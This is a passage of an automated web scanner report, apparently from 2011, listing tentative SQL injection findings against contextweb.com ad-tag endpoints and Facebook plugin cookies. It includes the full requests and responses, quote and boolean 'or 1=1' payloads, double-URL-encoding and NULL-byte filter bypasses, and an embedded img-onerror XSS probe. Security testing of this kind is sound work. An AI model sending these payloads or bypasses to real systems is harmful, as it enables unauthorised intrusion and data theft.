User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; FC1-WC=^53620_1_2TBaI; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0; V=wOebwAz4UvVv; 530930_3_90494=1305036044955; vf=4

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1412
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 10 May 2011 14:09:40 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Thu, 10-May-2012 14:09:40 GMT; path=/
Set-Cookie: 530930_4_90495=1305036580989; domain=.contextweb.com; path=/
Set-Cookie: vf=5; domain=.contextweb.com; expires=Wed, 11-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<IFRAME HEIGHT="90" WIDTH="728" SRC="http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html" VISIBLE="true" MARGINWIDTH
...[SNIP]...

1.20. http://tag.contextweb.com/TagPublish/getad.aspx [tz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the tz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90494&cf=300X250&cn=1&rq=1&dw=865&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=42339118&if=0&tl=1&pxy=670,265&cxy=865,527&dxy=865,527&tz=300%2527&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0; cw=cw

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1183
Date: Tue, 10 May 2011 14:11:07 GMT
Connection: close

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app202_suBTQLG9
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90494&cf=300X250&cn=1&rq=1&dw=865&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=42339118&if=0&tl=1&pxy=670,265&cxy=865,527&dxy=865,527&tz=300%2527%2527&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0; cw=cw

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2546
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 10 May 2011 14:11:07 GMT
Connection: close
Set-Cookie: V=RiC6i2pCL3Ub; domain=.contextweb.com; expires=Thu, 10-May-2012 14:11:07 GMT; path=/
Set-Cookie: 530930_3_90494=1305036667417; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 11-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script language="JavaScript">\n'
+ 'var zflag_nid="1432"; var zflag_cid="1"; var zflag_sid="1"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9";\n'
+ '</scr
...[SNIP]...

1.21. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /TagPublish%00'/getjs.aspx?01AD=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ&01RI=9A58E40C8074BA9&01NA=&action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=530930&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=90494 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=CT-1; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
nnCoection: close
Content-Length: 34
Vary: Accept-Encoding
Date: Tue, 10 May 2011 14:10:31 GMT
Connection: close
Set-Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; expires=Tue, 07-Jun-2011 14:10:31 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /TagPublish%00''/getjs.aspx?01AD=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ&01RI=9A58E40C8074BA9&01NA=&action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=530930&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=90494 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=CT-1; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0

Response 2

HTTP/1.1 400 Bad Request
X-Powered-By: Servlet/3.0
Content-Length: 0
Cneonction: close
Date: Tue, 10 May 2011 14:10:31 GMT
Connection: close
Set-Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; expires=Tue, 07-Jun-2011 14:10:31 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

1.22. http://www.facebook.com/plugins/facepile.php [datr cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 14514548'%20or%201%3d1--%20 and 14514548'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ad7f444%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff1a56ca204%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo214514548'%20or%201%3d1--%20; lsd=M8vgg

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.40
X-Cnection: close
Date: Tue, 10 May 2011 13:36:49 GMT
Content-Length: 6665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="transparent_widget facepile UIPage_LoggedOut safari4 Locale_en_US">
<div class="connect_widget"><div class="clearfix profile_images_with_margin"></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375981,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"71b9b",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"kM3FS":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yX\/r\/AZ23fTP8PUp.css"},"\/lUyM":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yj\/r\/QyZCsJKRLP8.css"},"ff6N5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yD\/r\/rZiaNe7iEDZ.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y8\/r\/w8K2nfDzJmR.css"}});Bootloader.setResourceMap({"Zz9gy":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yE\/r\/AKaGrClUAcV.js"},"JRfiS":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/KI-TuOEwsYB.js"},"iJB9Y":{"type":"js","sr
...[SNIP]...

Request 2

GET /plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ad7f444%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff1a56ca204%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo214514548'%20or%201%3d2--%20; lsd=M8vgg

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.46
X-Cnection: close
Date: Tue, 10 May 2011 13:36:50 GMT
Content-Length: 6691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/YT_08LAa7Q_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/sBdNI8BQygP.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="transparent_widget facepile UIPage_LoggedOut safari4 Locale_en_US">
<div class="connect_widget"><div class="clearfix profile_images_with_margin"></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375981,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"8a049",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"kM3FS":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yl\/r\/YT_08LAa7Q_.css"},"\/lUyM":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yj\/r\/QyZCsJKRLP8.css"},"ff6N5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yO\/r\/sBdNI8BQygP.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/v1\/yC\/r\/CATT0k7_6Qj.css"}});Bootloader.setResourceMap({"Zz9gy":{"type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/v1\/yE\/r\/AKaGrClUAcV.js"},"JRfiS":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/KI-TuOEwsYB.js"},"iJB9Y":{"type":
...[SNIP]...

1.23. http://www.facebook.com/plugins/likebox.php [datr cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 20789087'%20or%201%3d1--%20 and 20789087'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/likebox.php?href=http://www.facebook.com/pages/New-York-NY/mocoNews/87122473238&width=192&height=60&colorscheme=light&connections=0&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo220789087'%20or%201%3d1--%20; lsd=M8vgg

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.99.27
X-Cnection: close
Date: Tue, 10 May 2011 13:40:50 GMT
Content-Length: 9211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="auto_resize_iframe fan_widget connect_widget UIPage_LoggedOut safari4 Locale_en_US">
<div class="app_content_87122473238"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/mocoNews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41599_87122473238_6589482_q.jpg" alt="mocoNews" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/mocoNews" target="_blank"><span class="name">mocoNews</span></a></div><div><div id="connect_widget_4dc94062ce4eb1d48734681" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">Y
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http://www.facebook.com/pages/New-York-NY/mocoNews/87122473238&width=192&height=60&colorscheme=light&connections=0&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo220789087'%20or%201%3d2--%20; lsd=M8vgg

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.88.32
X-Cnection: close
Date: Tue, 10 May 2011 13:40:52 GMT
Content-Length: 9237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/YT_08LAa7Q_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/sBdNI8BQygP.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="auto_resize_iframe fan_widget connect_widget UIPage_LoggedOut safari4 Locale_en_US">
<div class="app_content_87122473238"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/mocoNews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41599_87122473238_6589482_q.jpg" alt="mocoNews" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/mocoNews" target="_blank"><span class="name">mocoNews</span></a></div><div><div id="connect_widget_4dc940640b0e43397323225" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_ele
...[SNIP]...

1.24. http://www.facebook.com/plugins/recommendations.php [datr cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 19807859'%20or%201%3d1--%20 and 19807859'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

